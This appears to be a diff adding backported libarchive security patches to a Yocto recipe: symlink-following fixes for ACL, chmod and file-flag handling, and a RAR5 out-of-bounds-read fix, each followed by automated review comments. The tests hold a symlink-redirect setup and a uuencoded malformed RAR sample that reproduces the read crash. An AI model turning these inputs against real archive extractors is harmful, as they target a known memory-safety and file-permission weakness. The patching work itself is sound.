6LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" 6LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
7 7
8SRC_URI = "git://pagure.io/libaio.git;protocol=https \ 8SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
9 file://00_arches.patch \ 9 file://00_arches.patch \
10 file://destdir.patch \ 10 file://destdir.patch \
11 file://libaio_fix_for_mips_syscalls.patch \ 11 file://libaio_fix_for_mips_syscalls.patch \
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
new file mode 100644
index 0000000000..555c7a47f7
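--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
@@ -0,0 +1,183 @@
+Description: Fix handling of symbolic link ACLs
+ Published as CVE-2021-23177
+Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad
+Bug-Debian: https://bugs.debian.org/1001986
+Author: Martin Matuska <martin@matuska.org>
+Last-Updated: 2021-12-20
+
+CVE: CVE-2021-23177
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_disk_acl_freebsd.c
++++ b/libarchive/archive_disk_acl_freebsd.c
+@@ -319,7 +319,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -364,6 +364,13 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -542,7 +549,10 @@
+ else if (acl_set_link_np(name, acl_type, acl) != 0)
+ #else
+ /* FreeBSD older than 8.0 */
+- else if (acl_set_file(name, acl_type, acl) != 0)
++ else if (S_ISLNK(mode)) {
++ /* acl_set_file() follows symbolic links, skip */
++ ret = ARCHIVE_OK;
++ } else if (acl_set_file(name, acl_type, acl) != 0)
+ #endif
+ {
+ if (errno == EOPNOTSUPP) {
+@@ -677,14 +687,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -693,7 +703,7 @@
+ #if ARCHIVE_ACL_FREEBSD_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif
+--- a/libarchive/archive_disk_acl_linux.c
++++ b/libarchive/archive_disk_acl_linux.c
+@@ -343,6 +343,11 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support RichACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
+ richacl = richacl_alloc(entries);
+ if (richacl == NULL) {
+ archive_set_error(a, errno,
+@@ -455,7 +460,7 @@
+ #if ARCHIVE_ACL_LIBACL
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -488,6 +493,18 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support ACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -727,14 +744,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+ }
+ #endif /* ARCHIVE_ACL_LIBACL */
+--- a/libarchive/archive_disk_acl_sunos.c
++++ b/libarchive/archive_disk_acl_sunos.c
+@@ -443,7 +443,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ aclent_t *aclent;
+@@ -467,7 +467,6 @@
+ if (entries == 0)
+ return (ARCHIVE_OK);
+
+-
+ switch (ae_requested_type) {
+ case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E:
+ cmd = SETACL;
+@@ -492,6 +491,12 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Skip ACLs on symbolic links */
++ ret = ARCHIVE_OK;
++ goto exit_free;
++ }
++
+ e = 0;
+
+ while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type,
+@@ -801,7 +806,7 @@
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ /* Solaris writes POSIX.1e access and default ACLs together */
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -810,7 +815,7 @@
+ #if ARCHIVE_ACL_SUNOS_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif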
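Review bot: The new `S_ISLNK(mode)` and `!S_ISDIR(mode)` guards in the three set_acl() variants decide from the `mode` value handed in by the caller, while the path-based calls they protect (for example `acl_set_file(name, ...)` in the pre-8.0 FreeBSD branch) act on whatever `name` refers to on disk at that moment. The hunks do not show where `mode` originates, so it is worth confirming that each caller passes the type of the on-disk object rather than only the archive entry's mode; the fixup-list change in CVE-2021-31566-02.patch appears to rely on this by rewriting `p->mode` after an lstat(). A short comment at the guards, e.g. `/* mode must describe the on-disk object, see the fixup list handling */`, would record that contract. The function bodies and their callers extend outside the hunks.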
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
new file mode 100644
index 0000000000..c4a2fb612c
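--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
@@ -0,0 +1,23 @@
+Description: Never follow symlinks when setting file flags on Linux
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -3927,7 +3927,8 @@
+
+ /* If we weren't given an fd, open it ourselves. */
+ if (myfd < 0) {
+- myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC);
++ myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY |
++ O_CLOEXEC | O_NOFOLLOW);
+ __archive_ensure_cloexec_flag(myfd);
+ }
+ if (myfd < 0)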
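Review bot: `O_NOFOLLOW` on this `open()` only refuses a symbolic link in the final path component; links in the parent directories of `name` are still resolved, so the fix depends on the directory path being checked elsewhere. What happens once the open fails on a symlink is decided by the `if (myfd < 0)` branch, which continues outside the hunk and should return without falling back to a path-based call. The existing comment could be extended to say so, e.g. `/* O_NOFOLLOW: do not set file flags through a final-component symlink */`.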
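--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
@@ -0,0 +1,172 @@
+Description: Do not follow symlinks when processing the fixup list
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -556,6 +556,7 @@
+ libarchive/test/test_write_disk.c \
+ libarchive/test/test_write_disk_appledouble.c \
+ libarchive/test/test_write_disk_failures.c \
++ libarchive/test/test_write_disk_fixup.c \
+ libarchive/test/test_write_disk_hardlink.c \
+ libarchive/test/test_write_disk_hfs_compression.c \
+ libarchive/test/test_write_disk_lookup.c \
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -2461,6 +2461,7 @@
+ {
+ struct archive_write_disk *a = (struct archive_write_disk *)_a;
+ struct fixup_entry *next, *p;
++ struct stat st;
+ int fd, ret;
+
+ archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC,
+@@ -2478,6 +2479,20 @@
+ (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) {
+ fd = open(p->name,
+ O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC);
++ if (fd == -1) {
++ /* If we cannot lstat, skip entry */
++ if (lstat(p->name, &st) != 0)
++ goto skip_fixup_entry;
++ /*
++ * If we deal with a symbolic link, mark
++ * it in the fixup mode to ensure no
++ * modifications are made to its target.
++ */
++ if (S_ISLNK(st.st_mode)) {
++ p->mode &= ~S_IFMT;
++ p->mode |= S_IFLNK;
++ }
++ }
+ }
+ if (p->fixup & TODO_TIMES) {
+ set_times(a, fd, p->mode, p->name,
+@@ -2492,7 +2507,12 @@
+ fchmod(fd, p->mode);
+ else
+ #endif
+- chmod(p->name, p->mode);
++#ifdef HAVE_LCHMOD
++ lchmod(p->name, p->mode);
++#else
++ if (!S_ISLNK(p->mode))
++ chmod(p->name, p->mode);
++#endif
+ }
+ if (p->fixup & TODO_ACLS)
+ archive_write_disk_set_acls(&a->archive, fd,
+@@ -2503,6 +2523,7 @@
+ if (p->fixup & TODO_MAC_METADATA)
+ set_mac_metadata(a, p->name, p->mac_metadata,
+ p->mac_metadata_size);
++skip_fixup_entry:
+ next = p->next;
+ archive_acl_clear(&p->acl);
+ free(p->mac_metadata);
+@@ -2643,6 +2664,7 @@
+ fe->next = a->fixup_list;
+ a->fixup_list = fe;
+ fe->fixup = 0;
++ fe->mode = 0;
+ fe->name = strdup(pathname);
+ return (fe);
+ }
+--- a/libarchive/test/CMakeLists.txt
++++ b/libarchive/test/CMakeLists.txt
+@@ -208,6 +208,7 @@
+ test_write_disk.c
+ test_write_disk_appledouble.c
+ test_write_disk_failures.c
++ test_write_disk_fixup.c
+ test_write_disk_hardlink.c
+ test_write_disk_hfs_compression.c
+ test_write_disk_lookup.c
+--- /dev/null
++++ b/libarchive/test/test_write_disk_fixup.c
+@@ -0,0 +1,77 @@
++/*-
++ * Copyright (c) 2021 Martin Matuska
++ * All rights reserved.
++ *
++ * Redistribution and use in source and binary forms, with or without
++ * modification, are permitted provided that the following conditions
++ * are met:
++ * 1. Redistributions of source code must retain the above copyright
++ * notice, this list of conditions and the following disclaimer.
++ * 2. Redistributions in binary form must reproduce the above copyright
++ * notice, this list of conditions and the following disclaimer in the
++ * documentation and/or other materials provided with the distribution.
++ *
++ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
++ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
++ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
++ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
++ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
++ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
++ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
++ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
++ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
++ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
++ */
++#include "test.h"
++
++/*
++ * Test fixup entries don't follow symlinks
++ */
++DEFINE_TEST(test_write_disk_fixup)
++{
++ struct archive *ad;
++ struct archive_entry *ae;
++ int r;
++
++ if (!canSymlink()) {
++ skipping("Symlinks not supported");
++ return;
++ }
++
++ /* Write entries to disk. */
++ assert((ad = archive_write_disk_new()) != NULL);
++
++ /*
++ * Create a file
++ */
++ assertMakeFile("victim", 0600, "a");
++
++ /*
++ * Create a directory and a symlink with the same name
++ */
++
++ /* Directory: dir */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFDIR | 0606);
++ assertEqualIntA(ad, 0, archive_write_header(ad, ae));
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ /* Symbolic Link: dir -> foo */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFLNK | 0777);
++ archive_entry_set_size(ae, 0);
++ archive_entry_copy_symlink(ae, "victim");
++ assertEqualIntA(ad, 0, r = archive_write_header(ad, ae));
++ if (r >= ARCHIVE_WARN)
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ assertEqualInt(ARCHIVE_OK, archive_write_free(ad));
++
++ /* Test the entries on disk. */
++ assertIsSymlink("dir", "victim", 0);
++ assertFileMode("victim", 0600);
++}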
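Review bot: In the `#else` fallback of the chmod hunk (`if (!S_ISLNK(p->mode)) chmod(p->name, p->mode);`) the symlink decision comes from the earlier `lstat()`, and only when `open()` had failed, while `chmod()` resolves `p->name` again, so a path replaced by a symlink between the two calls is still followed. The results of `lchmod()` and `chmod()` are also discarded, so a refused mode change goes unnoticed. I would at least document the window with `/* Best effort: lstat() and chmod() are not atomic; a concurrent rename can still redirect this call. */` and consider raising a warning when the call fails. The fixup function begins and ends outside the hunks shown.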
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
new file mode 100644
index 0000000000..fca53fc9b6
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
1From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
2From: Grzegorz Antoniak <ga@anadoxin.org>
3Date: Sat, 13 Feb 2021 09:08:13 +0100
4Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
5
6Added more range checks in the bit stream reading functions
7(read_bits_16 and read_bits_32) in order to better guard against out of
8memory reads.
9
10This commit contains a test with OSSFuzz sample #30448.
11
12Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
13CVE: CVE-2021-36976
14Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
15---
16 Makefile.am | 1 +
17 libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
18 libarchive/test/test_read_format_rar5.c | 16 +++
19 ...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++
20 4 files changed, 89 insertions(+), 46 deletions(-)
21 create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
22
23--- a/Makefile.am
24+++ b/Makefile.am
25@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
26 libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
27 libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
28 libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
29+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
30 libarchive/test/test_read_format_raw.bufr.uu \
31 libarchive/test/test_read_format_raw.data.gz.uu \
32 libarchive/test/test_read_format_raw.data.Z.uu \
33--- a/libarchive/archive_read_support_format_rar5.c
34+++ b/libarchive/archive_read_support_format_rar5.c
35@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
36 return ret;
37 }
38
39-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
40+static int read_bits_32(struct archive_read* a, struct rar5* rar,
41+ const uint8_t* p, uint32_t* value)
42+{
43+ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
44+ archive_set_error(&a->archive,
45+ ARCHIVE_ERRNO_PROGRAMMER,
46+ "Premature end of stream during extraction of data (#1)");
47+ return ARCHIVE_FATAL;
48+ }
49+
50 uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
51 bits |= p[rar->bits.in_addr + 1] << 16;
52 bits |= p[rar->bits.in_addr + 2] << 8;
53@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
54 return ARCHIVE_OK;
55 }
56
57-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
58+static int read_bits_16(struct archive_read* a, struct rar5* rar,
59+ const uint8_t* p, uint16_t* value)
60+{
61+ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
62+ archive_set_error(&a->archive,
63+ ARCHIVE_ERRNO_PROGRAMMER,
64+ "Premature end of stream during extraction of data (#2)");
65+ return ARCHIVE_FATAL;
66+ }
67+
68 int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
69 bits |= (int) p[rar->bits.in_addr + 1] << 8;
70 bits |= (int) p[rar->bits.in_addr + 2];
71@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
72 }
73
74 /* n = up to 16 */
75-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
76- int* value)
77+static int read_consume_bits(struct archive_read* a, struct rar5* rar,
78+ const uint8_t* p, int n, int* value)
79 {
80 uint16_t v;
81 int ret, num;
82@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
83 return ARCHIVE_FATAL;
84 }
85
86- ret = read_bits_16(rar, p, &v);
87+ ret = read_bits_16(a, rar, p, &v);
88 if(ret != ARCHIVE_OK)
89 return ret;
90
91@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
92 static int decode_number(struct archive_read* a, struct decode_table* table,
93 const uint8_t* p, uint16_t* num)
94 {
95- int i, bits, dist;
96+ int i, bits, dist, ret;
97 uint16_t bitfield;
98 uint32_t pos;
99 struct rar5* rar = get_context(a);
100
101- if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
102- return ARCHIVE_EOF;
103+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
104+ return ret;
105 }
106
107 bitfield &= 0xfffe;
108@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
109 for(i = 0; i < HUFF_TABLE_SIZE;) {
110 uint16_t num;
111
112- if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
113- /* Truncated data, can't continue. */
114- archive_set_error(&a->archive,
115- ARCHIVE_ERRNO_FILE_FORMAT,
116- "Truncated data in huffman tables (#2)");
117- return ARCHIVE_FATAL;
118- }
119-
120 ret = decode_number(a, &rar->cstate.bd, p, &num);
121 if(ret != ARCHIVE_OK) {
122 archive_set_error(&a->archive,
123@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
124 /* 16..17: repeat previous code */
125 uint16_t n;
126
127- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
128- return ARCHIVE_EOF;
129+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
130+ return ret;
131
132 if(num == 16) {
133 n >>= 13;
134@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
135 /* other codes: fill with zeroes `n` times */
136 uint16_t n;
137
138- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
139- return ARCHIVE_EOF;
140+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
141+ return ret;
142
143 if(num == 18) {
144 n >>= 13;
145@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
146 }
147
148 /* Convenience function used during filter processing. */
149-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
150- uint32_t* filter_data)
151+static int parse_filter_data(struct archive_read* a, struct rar5* rar,
152+ const uint8_t* p, uint32_t* filter_data)
153 {
154- int i, bytes;
155+ int i, bytes, ret;
156 uint32_t data = 0;
157
158- if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
159- return ARCHIVE_EOF;
160+ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
161+ return ret;
162
163 bytes++;
164
165 for(i = 0; i < bytes; i++) {
166 uint16_t byte;
167
168- if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
169- return ARCHIVE_EOF;
170+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
171+ return ret;
172 }
173
174 /* Cast to uint32_t will ensure the shift operation will not
175@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
176 uint16_t filter_type;
177 struct filter_info* filt = NULL;
178 struct rar5* rar = get_context(ar);
179+ int ret;
180
181 /* Read the parameters from the input stream. */
182- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
183- return ARCHIVE_EOF;
184+ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
185+ return ret;
186
187- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
188- return ARCHIVE_EOF;
189+ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
190+ return ret;
191
192- if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
193- return ARCHIVE_EOF;
194+ if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
195+ return ret;
196
197 filter_type >>= 13;
198 skip_bits(rar, 3);
199@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
200 if(filter_type == FILTER_DELTA) {
201 int channels;
202
203- if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
204- return ARCHIVE_EOF;
205+ if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
206+ return ret;
207
208 filt->channels = channels + 1;
209 }
210@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
211 return ARCHIVE_OK;
212 }
213
214-static int decode_code_length(struct rar5* rar, const uint8_t* p,
215- uint16_t code)
216+static int decode_code_length(struct archive_read* a, struct rar5* rar,
217+ const uint8_t* p, uint16_t code)
218 {
219 int lbits, length = 2;
220+
221 if(code < 8) {
222 lbits = 0;
223 length += code;
224@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
225 if(lbits > 0) {
226 int add;
227
228- if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
229+ if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
230 return -1;
231
232 length += add;
233@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
234 continue;
235 } else if(num >= 262) {
236 uint16_t dist_slot;
237- int len = decode_code_length(rar, p, num - 262),
238+ int len = decode_code_length(a, rar, p, num - 262),
239 dbits,
240 dist = 1;
241
242@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
243 uint16_t low_dist;
244
245 if(dbits > 4) {
246- if(ARCHIVE_OK != read_bits_32(
247- rar, p, &add)) {
248+ if(ARCHIVE_OK != (ret = read_bits_32(
249+ a, rar, p, &add))) {
250 /* Return EOF if we
251 * can't read more
252 * data. */
253- return ARCHIVE_EOF;
254+ return ret;
255 }
256
257 skip_bits(rar, dbits - 4);
258@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
259 /* dbits is one of [0,1,2,3] */
260 int add;
261
262- if(ARCHIVE_OK != read_consume_bits(rar,
263- p, dbits, &add)) {
264+ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
265+ p, dbits, &add))) {
266 /* Return EOF if we can't read
267 * more data. */
268- return ARCHIVE_EOF;
269+ return ret;
270 }
271
272 dist += add;
273@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
274 return ARCHIVE_FATAL;
275 }
276
277- len = decode_code_length(rar, p, len_slot);
278+ len = decode_code_length(a, rar, p, len_slot);
279+ if (len == -1) {
280+ return ARCHIVE_FATAL;
281+ }
282+
283 rar->cstate.last_len = len;
284
285 if(ARCHIVE_OK != copy_string(a, len, dist))
286--- a/libarchive/test/test_read_format_rar5.c
287+++ b/libarchive/test/test_read_format_rar5.c
288@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
289
290 EPILOGUE();
291 }
292+
293+DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
294+{
295+ /* oss fuzz 30448 */
296+
297+ char buf[4096];
298+ PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
299+
300+ /* Return codes of those calls are ignored, because this sample file
301+ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
302+ * errors during processing. */
303+
304+ (void) archive_read_next_header(a, &ae);
305+ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
306+
307+ EPILOGUE();
308+}
309--- /dev/null
310+++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
311@@ -0,0 +1,10 @@
312+begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
313+M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
314+M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
315+M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
316+M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
317+M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
318+M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
319+E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
320+`
321+end
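Review bot: The new guard in `read_bits_32` (and the matching one in `read_bits_16`) tests only `rar->bits.in_addr >= rar->cstate.cur_block_size`, yet the lines right after it read `p[rar->bits.in_addr + 3]` and `p[rar->bits.in_addr + 2]` respectively, so an offset in the last bytes of the block passes the check and still reads beyond `cur_block_size`. Whether the buffer behind `p` always carries that much slack is not visible here; if it does, a comment stating the invariant is needed, otherwise the comparison should account for the bytes consumed, e.g. `if(rar->bits.in_addr + 3 >= rar->cstate.cur_block_size)` in `read_bits_32`. The same patch drops the `in_addr + 6` truncation check from `parse_tables`, which leaves these two guards as the only bound on that path. The first `decode_code_length` call in `do_uncompress_block` (`num - 262`) gets no `len == -1` test in the visible lines, unlike the second call site.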
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
new file mode 100644
index 0000000000..b5da44ec7b
--- /dev/null
